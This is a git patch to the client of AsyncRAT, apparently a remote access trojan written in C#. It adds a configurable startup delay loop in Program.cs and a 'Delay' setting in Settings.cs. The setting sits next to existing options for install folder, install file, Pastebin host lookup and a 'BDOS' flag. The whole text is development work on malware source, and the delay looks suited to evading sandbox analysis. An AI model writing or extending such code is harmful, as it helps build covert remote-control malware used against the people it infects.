From f7f84aa405b318f1ba71d84ff997820748733db5 Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Sun, 1 Dec 2019 06:36:38 +0300 Subject: [PATCH] added custom sleep --- AsyncRAT-C#/Client/Program.cs | 5 ++++- AsyncRAT-C#/Client/Settings.cs | 4 +++- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs index b7ed309..9422cd9 100644 --- a/AsyncRAT-C#/Client/Program.cs +++ b/AsyncRAT-C#/Client/Program.cs @@ -18,7 +18,10 @@ namespace Client { public static void Main() { - Thread.Sleep(2500); + for (int i = 0; i < Convert.ToInt32(Settings.Delay); i++) + { + Thread.Sleep(1000); + } if (!Settings.InitializeSettings()) Environment.Exit(0); try diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index 7dfa462..3f60972 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -13,7 +13,7 @@ namespace Client #if DEBUG public static string Ports = "6606"; public static string Hosts = "127.0.0.1"; - public static string Version = "0.5.4H"; + public static string Version = "0.5.5A"; public static string Install = "false"; public static string InstallFolder = "AppData"; public static string InstallFile = "Test.exe"; @@ -27,6 +27,7 @@ namespace Client public static string Pastebin = "null"; public static string BDOS = "false"; public static string Hwid = HwidGen.HWID(); + public static string Delay = "0"; #else public static string Ports = "%Ports%"; @@ -45,6 +46,7 @@ namespace Client public static string Pastebin = "%Pastebin%"; public static string BDOS = "%BDOS%"; public static string Hwid = ""; + public static string Delay = "%Delay%"; #endif